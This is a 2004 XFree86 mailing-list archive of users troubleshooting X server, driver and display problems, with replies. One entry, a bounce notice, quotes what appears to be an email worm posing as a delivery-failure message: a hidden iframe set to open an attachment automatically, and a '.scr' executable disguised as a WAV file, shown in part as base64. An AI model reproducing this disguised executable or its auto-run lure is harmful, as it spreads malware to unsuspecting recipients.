 (II) PCI: 02:0d:0: chip 1102,0002 card 1102,8026 rev 07 class 04,01,00
 hdr 80
 (II) PCI: 02:0d:1: chip 1102,7002 card 1102,0020 rev 07 class 09,80,00
 hdr 80
 (II) PCI: End of PCI scan
 (II) Host-to-PCI bridge:
 (II) Bus 0: bridge is at (0:0:0), (0,0,2), BCTRL: 0x0008 (VGA_EN is set)
 (II) Bus 0 I/O range:
 [0] -1  0   0x - 0x (0x1) IX[B]
 (II) Bus 0 non-prefetchable memory range:
 [0] -1  0   0x - 0x (0x0) MX[B]
 (II) Bus 0 prefetchable memory range:
 [0] -1  0   0x - 0x (0x0) MX[B]
 (II) PCI-to-PCI bridge:
 (II) Bus 1: bridge is at (0:1:0), (0,1,1), BCTRL: 0x0008 (VGA_EN is set)
 (II) Bus 1 non-prefetchable memory range:
 [0] -1  0   0xee00 - 0xefdf (0x1e0) MX[B]
 (II) Bus 1 prefetchable memory range:
 [0] -1  0   

Re: [XFree86] Asus Pundit and xv - what's your experience

2004-03-25 Thread Robert Rozman
Thomas,

I'd like to personally thank you for your effort. It seems like XvMemcpy
setting was solution for me, althought it says in faq that this problem
should be gone with newer versions of xfree (I have 4.4).

I think that maybe stressing this setting little more would prevent someone
else going on my route...

Regards,

Robert.

- Original Message - 
From: Thomas Winischhofer [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, March 25, 2004 12:45 PM
Subject: Re: [XFree86] Asus Pundit and xv - what's your experience


 Robert Rozman wrote:
  Hi,
 
  I'm recently posting about my problems with Asus Pundit slow xv
performance
  (Suse 9.0, P4 2.4G , xfree 4.4, sis 651 chipset - I get with xvtest
around
  200 FPS).
 
  Obviously I have no obvious options to tackle this problem (Thomas ran
out
  of ideas), so would like to ask about your experiences, troubles,
advices
  with this machine/chipset and xv ? I had working configuration, but then
did
  security upgrades and it didn't work anymore (also after downgrade to
  previous system). There are some suspects to o_sync wulnerability of
Suse
  systems, but how can I check that (cat proc/mtrr - anything else) ?
 
  In my case everything seems fine from logs, just xv performance is bad
  (x11perf gets better results 400/sec)...

 Strictly speaking, it is not xv performance but memcpy() performance.

 I have a pundit myself and I don't experience that problem (using
 Debian's 4.3 packages)

 Thomas

 -- 
 Thomas Winischhofer
 Vienna/Austria
 thomas AT winischhofer DOT net*** http://www.winischhofer.net
 twini AT xfree86 DOT org
 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Please Help

2004-03-25 Thread Darrel Irwin



Hello;
I am new to Linux (Red Hat 8.0) and Have been 
trying to get this version to run on an Intel - 2.0 gZ HP Pavilion.
I have researched and read loads of instructions on 
how to -installxfree86 4.3.0to get my graphics card to work 

(I have a 82845G/GL controler).
I think I need help.I am lost in the 
process!
I am running Win XP to access the FTP sites but 
don't know how to do a lot of things they talk about. .TGZ vs .EXE 
etc.
Is there anyone whom might be willing to coach me 
through thiseither by phone or e-mail and help me! 
I can do most things with Windows but I want to get 
free from "Microsoft" and I really would love "Red Hat" if I can overcome some 
of these obstacles! 
I just need a (plain english version) step by step 
and I can't ask a "Read.me file" questions. Just talking to someone might help 
although I cannot afford to pay for technical help.

Please reply to;
Darrel Irwin (aka civilwest)
P.O.Box 202 
McLeod, Texas 75565-0202
(903)796-5493
[EMAIL PROTECTED]

  
  

  
This message has been scanned for viruses by the VEI Internet
Automatic Email Spam and Virus Scanner, and is believed to be free of spam or viruses.
Please report spam to [EMAIL PROTECTED].  If you would like 98.9 % spam blocked from your
E-mail then go to VEI Internet for details.  Anti-spam/Anti-virus is FREE with every account.


[XFree86] X not working after kernel upgrade

2004-03-25 Thread [EMAIL PROTECTED]
Please forgive the brevity but this is my fifth try and so far none of
my post have made it to the list.
After kernel upgrade X windows won't work can anyone please give me a
pointer.
Here are some files if this posts I will elaborate
Thanks Gary Fazenbaker

XFree86 Version 4.3.0 (Red Hat Linux 9 release: 4.3.0-2.90.55)
Release Date: 15 August 2003
X Protocol Version 11, Revision 0, Release 6.6
Build Operating System: Linux 2.4.21-2.ELsmp i686 [ELF]
Build Date: 12 February 2004
Build Host: porky.devel.redhat.com


Module Loader present
OS Kernel: Linux version 2.6.3-2.1.252smp
([EMAIL PROTECTED]) (gcc version 3.3.3 20040216 (Red
Hat Linux 3.3.3-2.1)) #1 SMP Tue Mar 9 10:28:07 EST 2004
Markers: (--) probed, (**) from config file, (==) default setting,
 (++) from command line, (!!) notice, (II) informational,
 (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: /dev/null, Time: Mon Mar 22 01:19:36 2004
(++) Using config file: [EMAIL PROTECTED]
(WW) RADEON: No matching Device section for instance (BusID PCI:0:18:0)
found
(EE) xf86OpenSerial: Cannot open device /dev/psaux
No such device.
(EE) Mouse0: cannot open input device
(EE) PreInit failed for input device Mouse0
No core pointer

Fatal server error:
failed to initialize core devices
Mar 16 02:32:51 localhost kernel: Linux version 2.6.3-2.1.252smp
([EMAIL PROTECTED]) (gcc version 3.3.3 20040216 (Red
Hat Linux 3.3.3-2.1)) #1 SMP Tue Mar 9 10:28:07 EST 2004BR
Mar 16 02:32:51 localhost kernel: BIOS-provided physical RAM map:BR
BR
BR
Mar 16 02:32:51 localhost kernel: PCI: Invalid ACPI-PCI IRQ routing
tableBR
BR
Mar 16 02:32:51 localhost kernel: apm: disabled - APM is not SMP
safe.BR
BR
Mar 16 02:32:51 localhost kernel: audit: initializing netlink socket
(disabled)BR
BR
Mar 16 02:32:52 localhost kernel: input: ImExPS/2 Logitech Explorer
Mouse on isa0060/serio1BR
BR
Mar 16 02:32:52 localhost kernel: input: AT Translated Set 2 keyboard on
isa0060/serio0BR
BR
Mar 16 02:32:52 localhost kernel: drivers/usb/core/usb.c: registered new
driver usbfsBR
Mar 16 02:32:52 localhost keytable:BR
Mar 16 02:32:52 localhost kernel: drivers/usb/core/usb.c: registered new
driver hubBR
Mar 16 02:32:52 localhost keytable: Loading system font:BR
Mar 16 02:32:52 localhost kernel: drivers/usb/core/usb.c: registered new
driver hiddevBR
Mar 16 02:32:52 localhost kernel: drivers/usb/core/usb.c: registered new
driver hidBR
Mar 16 02:32:52 localhost kernel: drivers/usb/input/hid-core.c: v2.0:USB
HID core driverBR
BR
Mar 16 02:32:52 localhost kernel: ip_tables: (C) 2000-2002 Netfilter
core teamBR
Mar 16 02:32:52 localhost kernel: Linux Tulip driver version 1.1.13 (May
11, 2002)BR
BR
Mar 16 02:32:59 localhost gpm[1190]: /dev/mouse: No such deviceBR
localhost xfs: ignoring font path element
/usr/X11R6/lib/X11/fonts/cyrillic (unreadable)BR
BR
atkbd.c: Unknown key released (translated set 2, code 0x7a on
isa0060/serio0).BR
BR
atkbd.c: This is an XFree86 bug. It shouldn't access hardware
directly.BR
BR
gdm[1544]: gdm_slave_xioerror_handler: Fatal X error - Restarting :0BR
BR
gdm[1473]: deal_with_x_crashes: Running the XKeepsCrashing scriptBR
BR
gdm[1473]: Failed to start X server 2 times in a short time
period;disabling display :0BR
BR
BR
XFree86 Version 4.3.0 (Red Hat Linux 9 release: 4.3.0-2.90.55)BR
Release Date: 15 August 2003BR
X Protocol Version 11, Revision 0, Release 6.6BR
Build Operating System: Linux 2.4.21-2.ELsmp i686 [ELF] BR
Build Date: 12 February 2004BR
Build Host: porky.devel.redhat.comBR
 BR
BR
Module Loader presentBR
OS Kernel: Linux version 2.6.3-2.1.252smp
([EMAIL PROTECTED]) (gcc version 3.3.3 20040216 (Red
Hat Linux 3.3.3-2.1)) #1 SMP Tue Mar 9 10:28:07 EST 2004 BR
Markers: (--) probed, (**) from config file, (==) default setting,BR
nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp; (++) from command line,
(!!) notice, (II) informational,BR
nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp; (WW) warning, (EE)
error, (NI) not implemented, (??) unknown.BR
(++) Log file: quot;/dev/nullquot;, Time: Mon Mar 22 01:19:36 2004BR
(++) Using config file: quot;[EMAIL PROTECTED]quot;BR
(WW) RADEON: No matching Device section for instance (BusID PCI:0:18:0)
foundBR
(EE) xf86OpenSerial: Cannot open device /dev/psauxBR
No such device.BR
(EE) Mouse0: cannot open input deviceBR
(EE) PreInit failed for input device quot;Mouse0quot;BR
No core pointerBR
BR
Fatal server error:BR
failed to initialize core devicesBR

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] dual dvi support

2004-03-25 Thread Daniel Fisher
Does the latest nv driver support the dual headed dvi connection on the 
GeForce FX 5200?
Specifically I want to use two X screens or Xinerama.
I'm using the 4.3 release and wondering if I should upgrade.
(The nvidia driver doesn't work in this setup on FreeBSD.)
Thanks.

--Daniel Fisher


___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Please help with Eurocom 8500V

2004-03-25 Thread Andre Hassan
Dear XFree86,
I hope you can help me without too much bother. I am attempting to install
RH 9.0 on a Eurocom 8500V notebook (made by Clevo, also 8500V).

The problem is as follows:
CD boot crashes error 104 (X related) - I gave up on upgrade and went for
full install, only linux text install works, but can not bring up X manually
afterwards. Problem seems to be related to flat panel/graphics configuration
 probing.

HW on system is ATI 128LT and Hitachi TX38D95VC1CAA panel (1400x1050 max
res).

Tried many different things but with no success. I have attached
XFree86.0.log file in case you may be able to help me.

Thanks in advance,
Andre


XFree86.0.log
Description: Binary data


Re: [XFree86] X not working after kernel upgrade

2004-03-25 Thread Mark Vojkovich
On Fri, 26 Mar 2004, [EMAIL PROTECTED] wrote:

 Please forgive the brevity but this is my fifth try and so far none of
 my post have made it to the list.
 After kernel upgrade X windows won't work can anyone please give me a
 pointer.

   Looks to me like you have no mouse support in your new kernel.
Ie. you have no /dev/psaux or /dev/mouse according to the log files.

Mark.


 Here are some files if this posts I will elaborate
 Thanks Gary Fazenbaker

 XFree86 Version 4.3.0 (Red Hat Linux 9 release: 4.3.0-2.90.55)
 Release Date: 15 August 2003
 X Protocol Version 11, Revision 0, Release 6.6
 Build Operating System: Linux 2.4.21-2.ELsmp i686 [ELF]
 Build Date: 12 February 2004
 Build Host: porky.devel.redhat.com


 Module Loader present
 OS Kernel: Linux version 2.6.3-2.1.252smp
 ([EMAIL PROTECTED]) (gcc version 3.3.3 20040216 (Red
 Hat Linux 3.3.3-2.1)) #1 SMP Tue Mar 9 10:28:07 EST 2004
 Markers: (--) probed, (**) from config file, (==) default setting,
  (++) from command line, (!!) notice, (II) informational,
  (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
 (++) Log file: /dev/null, Time: Mon Mar 22 01:19:36 2004
 (++) Using config file: [EMAIL PROTECTED]
 (WW) RADEON: No matching Device section for instance (BusID PCI:0:18:0)
 found
 (EE) xf86OpenSerial: Cannot open device /dev/psaux
   No such device.
 (EE) Mouse0: cannot open input device
 (EE) PreInit failed for input device Mouse0
 No core pointer

 Fatal server error:
 failed to initialize core devices
 Mar 16 02:32:51 localhost kernel: Linux version 2.6.3-2.1.252smp
 ([EMAIL PROTECTED]) (gcc version 3.3.3 20040216 (Red
 Hat Linux 3.3.3-2.1)) #1 SMP Tue Mar 9 10:28:07 EST 2004BR
 Mar 16 02:32:51 localhost kernel: BIOS-provided physical RAM map:BR
 BR
 BR
 Mar 16 02:32:51 localhost kernel: PCI: Invalid ACPI-PCI IRQ routing
 tableBR
 BR
 Mar 16 02:32:51 localhost kernel: apm: disabled - APM is not SMP
 safe.BR
 BR
 Mar 16 02:32:51 localhost kernel: audit: initializing netlink socket
 (disabled)BR
 BR
 Mar 16 02:32:52 localhost kernel: input: ImExPS/2 Logitech Explorer
 Mouse on isa0060/serio1BR
 BR
 Mar 16 02:32:52 localhost kernel: input: AT Translated Set 2 keyboard on
 isa0060/serio0BR
 BR
 Mar 16 02:32:52 localhost kernel: drivers/usb/core/usb.c: registered new
 driver usbfsBR
 Mar 16 02:32:52 localhost keytable:BR
 Mar 16 02:32:52 localhost kernel: drivers/usb/core/usb.c: registered new
 driver hubBR
 Mar 16 02:32:52 localhost keytable: Loading system font:BR
 Mar 16 02:32:52 localhost kernel: drivers/usb/core/usb.c: registered new
 driver hiddevBR
 Mar 16 02:32:52 localhost kernel: drivers/usb/core/usb.c: registered new
 driver hidBR
 Mar 16 02:32:52 localhost kernel: drivers/usb/input/hid-core.c: v2.0:USB
 HID core driverBR
 BR
 Mar 16 02:32:52 localhost kernel: ip_tables: (C) 2000-2002 Netfilter
 core teamBR
 Mar 16 02:32:52 localhost kernel: Linux Tulip driver version 1.1.13 (May
 11, 2002)BR
 BR
 Mar 16 02:32:59 localhost gpm[1190]: /dev/mouse: No such deviceBR
 localhost xfs: ignoring font path element
 /usr/X11R6/lib/X11/fonts/cyrillic (unreadable)BR
 BR
 atkbd.c: Unknown key released (translated set 2, code 0x7a on
 isa0060/serio0).BR
 BR
 atkbd.c: This is an XFree86 bug. It shouldn't access hardware
 directly.BR
 BR
 gdm[1544]: gdm_slave_xioerror_handler: Fatal X error - Restarting :0BR
 BR
 gdm[1473]: deal_with_x_crashes: Running the XKeepsCrashing scriptBR
 BR
 gdm[1473]: Failed to start X server 2 times in a short time
 period;disabling display :0BR
 BR
 BR
 XFree86 Version 4.3.0 (Red Hat Linux 9 release: 4.3.0-2.90.55)BR
 Release Date: 15 August 2003BR
 X Protocol Version 11, Revision 0, Release 6.6BR
 Build Operating System: Linux 2.4.21-2.ELsmp i686 [ELF] BR
 Build Date: 12 February 2004BR
 Build Host: porky.devel.redhat.comBR
  BR
   BR
 Module Loader presentBR
 OS Kernel: Linux version 2.6.3-2.1.252smp
 ([EMAIL PROTECTED]) (gcc version 3.3.3 20040216 (Red
 Hat Linux 3.3.3-2.1)) #1 SMP Tue Mar 9 10:28:07 EST 2004 BR
 Markers: (--) probed, (**) from config file, (==) default setting,BR
 nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp; (++) from command line,
 (!!) notice, (II) informational,BR
 nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp; (WW) warning, (EE)
 error, (NI) not implemented, (??) unknown.BR
 (++) Log file: quot;/dev/nullquot;, Time: Mon Mar 22 01:19:36 2004BR
 (++) Using config file: quot;[EMAIL PROTECTED]quot;BR
 (WW) RADEON: No matching Device section for instance (BusID PCI:0:18:0)
 foundBR
 (EE) xf86OpenSerial: Cannot open device /dev/psauxBR
   No such device.BR
 (EE) Mouse0: cannot open input deviceBR
 (EE) PreInit failed for input device quot;Mouse0quot;BR
 No core pointerBR
 BR
 Fatal server error:BR
 failed to initialize core devicesBR

 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86

___
XFree86 mailing list
[EMAIL 

Re: [XFree86] dual dvi support

2004-03-25 Thread Mark Vojkovich
   The nv driver doesn't support dual head operation.


Mark.

On Thu, 25 Mar 2004, Daniel Fisher wrote:

 Does the latest nv driver support the dual headed dvi connection on the
 GeForce FX 5200?
 Specifically I want to use two X screens or Xinerama.
 I'm using the 4.3 release and wondering if I should upgrade.
 (The nvidia driver doesn't work in this setup on FreeBSD.)
 Thanks.

 --Daniel Fisher


 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] X10: fatal IO error 104 (connection reset by peer)

2004-03-25 Thread jamas sumeral
To whom it may concern, 
I'm having problems getting X to run. I have a PNY
Technologies GeForce MMX 440 AGP / TwinView. I use the
TV Out as my primary display. I get a Fatal server
error: No Screens Found when I try to startx. Attached
is a copy of my XF86Config file and my XFree86.0.log
file. Any assistance you can provide would be most
appreciated. 

__
Do you Yahoo!?
Yahoo! Finance Tax Center - File online. File on time.
http://taxes.yahoo.com/filing.html
# XFree86 4 configuration created by pyxf86config

Section ServerLayout
Identifier Default Layout
Screen  0  Screen AGP TwinView 0 0
InputDeviceMouse0 CorePointer
InputDeviceKeyboard0 CoreKeyboard
InputDeviceDevInputMice AlwaysCore
EndSection

Section ServerLayout
Identifier AGPTwinView
Screen Screen AGP TwinView 0 0
InputDeviceMouse0 CorePointer
InputDeviceKeyboard0 CoreKeyboard
EndSection

Section Files
RgbPath  /usr/X11R6/lib/X11/rgb
FontPath unix/:7100
EndSection

Section Module
Load  dbe
# Load the glx module.
Load  glx
Load  extmod
Load  type1
Load  freetype
EndSection

Section ServerFlags
Option  allowmouseopenfail
EndSection

Section InputDevice
Identifier  Keyboard0
Driver  keyboard
Option  XkbRules xfree86
Option  XkbModel pc105
Option  XkbLayout us
EndSection

Section InputDevice
Identifier  Mouse0
Driver  mouse
Option  Protocol IMPS/2
Option  Device /dev/psaux
Option  ZAxisMapping 4 5
Option  Emulate3Buttons no
EndSection

Section InputDevice
Identifier  DevInputMice
Driver  mouse
Option  Protocol IMPS/2
Option  Device /dev/input/mice
Option  ZAxisMapping 4 5
Option  Emulate3Buttons no
EndSection

Section Monitor
Identifier   MyMonitor
VendorName   Monitor Vendor
ModelNameCompaq SVGA
HorizSync35.2 - 38.0
VertRefresh  56.0 - 60.0
Option  dpms
EndSection

Section Device
Identifier  NV AGP TwinView
Driver  nvidia
VendorName  nvidia
Option  TwinView
Option  SecondMonitorHorizSync 30-50
Option  SecondMonitorVertRefresh 60
Option  TwinViewOrientation Clone
Option  MetaModes NULL,1024x768; 1024x768,1024x768; 800x600,800x600; 
640x480,640x480
Option  ConnectedMonitor CRT,TV
BusID   PCI:1:0:0
EndSection

Section Screen
Identifier Screen AGP TwinView
Device NV AGP TwinView
MonitorMyMonitor
DefaultDepth 24
Option  TVStandard NTSC-M
Option  ConnectedMonitor TV
Option  TVOutFormat SVIDEO  #COMPOSITE
Option  TVOverScan 1.0
SubSection Display
Depth 8
Modes1280x1024 1024x768 800x600 640x400
EndSubSection
SubSection Display
Depth 16
Modes1280x1024 1024x768 800x600 640x480
EndSubSection
SubSection Display
Depth 24
Modes1280x1024 1024x768 800x600 640x480
EndSubSection
EndSection



XFree86.0.log
Description: XFree86.0.log


[XFree86] Invalid email address

2004-03-25 Thread mail
Unfortunately the email you sent to Sense Internet has not been delivered.
We are no longer using the sensei.co.uk domain for company email in our
ongoing fight against spam.

Please update your address book replacing @sensei.co.uk in the email address
with @sense.co.uk, and resend your email.

Thank you.

-- This is a copy of the message, including all the headers. --

Received: from ppp-82-84-219-141.cust-adsl.tiscali.it ([82.84.219.141] 
helo=sensei.co.uk)
by automail.sense.co.uk with esmtp (Exim 3.36 #4)
id 1B6lyd-0006S4-00
for [EMAIL PROTECTED]; Fri, 26 Mar 2004 07:42:03 +
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Mail Delivery (failure [EMAIL PROTECTED])
Date: Fri, 26 Mar 2004 08:36:20 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary==_NextPart_000_001B_01C0CA80.6B015D10
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: [EMAIL PROTECTED]

This is a multi-part message in MIME format.

--=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: multipart/alternative;
boundary==_NextPart_001_001C_01C0CA80.6B015D10

--=_NextPart_001_001C_01C0CA80.6B015D10
Content-Type: text/plain;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--=_NextPart_001_001C_01C0CA80.6B015D10
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN
HTMLHEAD
META content=3Dtext/html; charset=3Diso-8859-1 =
http-equiv=3DContent-Type
META content=3DMSHTML 5.00.2920.0 name=3DGENERATOR
STYLE/STYLE
/HEAD
BODY bgColor=3D#ffIf the message will not displayed automatically,br
follow the link to read the delivered message.brbr
Received message is available at:br
a href=3Dcid:[EMAIL PROTECTED] height=3D0 
width=3D0www.sensei.co.uk/inbox/glynn/read.php?sessionid-19915/a
iframe
src=3Dcid:[EMAIL PROTECTED] height=3D0 width=3D0/iframe 
DIVnbsp;/DIV/BODY/HTML

--=_NextPart_001_001C_01C0CA80.6B015D10--

--=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: audio/x-wav;
name=message.scr
Content-Transfer-Encoding: base64
Content-ID:[EMAIL PROTECTED]

TVqQAAME//8AALgAQAAA
YA4fug4AtAnNIbgBTM0hV2luZG93cyBQcm9ncmFtDQokUEUAAEwBAwAA
AADgAA8BCwEEcgAgAQAAECAAQAAAEAIAAAQA
BAAAMAEAAAQCAAAQAAAQABAAABAQ
AAD0IAEAawCwAABobQAA

dACgEAAA
AADgAADAAHRhcLAAAHRvBAAA4AAAwABh
ABAgAQAAAgIAAOAAAMAFBAYEAQDOIUAAAgAAQG4M
AABAAABAAAC70AFAAL8AEEAAviwcQQBT6AoC0nUFihZG
EtLD/LKApGoCW/8UJHP3M8n/FCRzGDPA/xQkcyGzAkGwEP8UJBLAc/l1P6rr3OhDK8t1
EOg46yis0eh0QRPJ6xyRSMHgCKzoIgAAAD0AfQAAcwqA/AVzBoP4f3cCQUGVi8WzAVaL
9yvw86Re65YzyUH/VCQEE8n/VCQEcvTDX1sPtztPdAhPdBPB5wzrB4t7AleDwwRDQ+lR
X7soIUEAR4s3r1f/E5UzwK51/f4PdO/+D3UGR/83r+sJ/g8PhKLw/v9XVf9TBAkGrXXbi+zD
HCEBNCEBACghAQAAAEAhAQBOIQEAAEAh
AQBOIQEAAEtFUk5FTDMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwDr



AAEAAgAYAQCAKAAAgAMAAABAAACADgAAAGAAAIEA
ZQAAAHgAAIIAAQAAAJAAAIACqAAAgAEA
AAAmAQCAwAAAgQAHBAAA2QAHBAAA
6QAHBAAA+QAHBAAACAEAADCx
aABEGQEA6AIAMEAAACgBADAZAQAi
AAAGAEIASQBOAEEAUgBZAAEAMABrfWaFlBWtHdaU3cSJ5jkxSa21WPCT
lzJZK9HA/RaOTkibC/U7SahjXd4/321otIeaqs3c98FEgSkIG0C6ODBOmsur3t5wGFBqh50K
ds6TPEgjC6CdNZN7rjIV8vVYEeYEudN7R75kOiMW8iMOucg+gAgTXuypw1pQ+ca7eliihvH+
BKZOhikSH0oRAfDprm0Vh687q8QC/ZmshNoRyjjQjMemK1iKjEvkj8KBP4/d0gQrjoViQVpc
RCQCofUL//pjNEcThyvQrFIhYOB29tPY/yF8mWd97Pk/bNiiP2WUW+j2DTqnFxOp9dMi6sWw
nvjkyggxsi4BkiGP2II4tZ6x1rLKgUZ8XsW+9S/Ji25/hCze1WlfWwiU3UCXYzryPnJEh8or
O18rjsHmyS6iSx58HvJ7SFS2KoUB065NYMOkJXQG7YFuOKmLZz6kIEHBlhsaL6fX2L2O7wDx
9kimzvhSeVIJise//UQYlGGngOYO+cK8/R3Dtl1ZsiPgXbQvX4G3M5dPL2tRQT3SqssXE6+c
RPIrIgjovkwjDS+TuzwDO5ZxT9aMdcoLPL4mlf+QoY4aadfuOJzaTxc8hPOBOwwHftPYKcgl
kil/IX4MHqULV82GzO85GtjqghWLg/Nnom7XI9tQycfRI2zCWjldmhV9ZjpG/XWq4UW4lJ05
+Tfr9wlX/1F596yCbQlgIqSy6YqsI1pPUpQdCV0IQVk8whLKDtufVb7pUszp8jvR3JOuBudv
jIg6ebOdnVJErWJhPY+YbUwHwgDlTEjwkU7rh4l3fuCDsZSUzOn1l5dTlVyVr8ZAxcqsJY5H
8V0Ln7vLpmfbROjSSDuPdsue4VP7+0ERbOcAiSSgdYdO8VDOM1YrXWVhYvE9XCXLiDDLs36G
aT30K6RL0rnD08Z0CeM6ckHihP+aGF0/tXGVFf19BUQ3vMTUWRmeuKC0wa3d5LplEH2g5TdO

[XFree86] startx from console

2004-03-25 Thread Dennis Robertson
Hello All,

I am a gentoo user, but got no response to this question on that list.

I have an ati 9700pro graphics card, configured to give dri using 
fglrxconfig.This produces an ati section in XF86Config-4 using driver 
fglrx. X starts normally using xdm/kdm and direct rendering=yes.

When I do lspci I get the following ati bit:
:03:00.0 VGA compatible controller: ATI Technologies Inc Radeon R300 ND
[Radeon 9700 Pro]
:03:00.1 Display controller: ATI Technologies Inc Radeon R300 [Radeon
 9700 Pro] (Secondary)

In the standard vga device section of XF86Config-4 I have radeon as the
driver.

If I boot to the console and try to 'startx' I get the following:
(==) Using config file: /etc/X11/XF86Config-4
Using vt 7
(WW) fglrx: no matching Device section for instance (BusID PCI:3:0:1) found
waiting for X server to shut down
and X fails to start.

So I added to XF86Config-4:
Section Device
Identifier  ATI Graphics Adapter
Driver  fglrx
BusID PCI:3:0:1# vendor=1002, device=4e44
Screen 0
EndSection
and 'startx' still gives the same message and X fails to start.

I am puzzled that (WW) which is a warning actually produces a failure. I
thought (EE), an error, was needed to fail the startx process. I am also
puzzled that X starts if I have xdm as default, but won't start from the
console.

I am using xfree-4.3.99.902-r2 and kernel 2.6.5-rc1-mm1.

I would like to be able to startx from the console. Can anyone help me to do
this, please?
-- 
Dennis Robertson  2/2 Sylvia Street Noosaville QLD Australia
Phone: 61 7 54742343  Mobile: 0419 535539
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86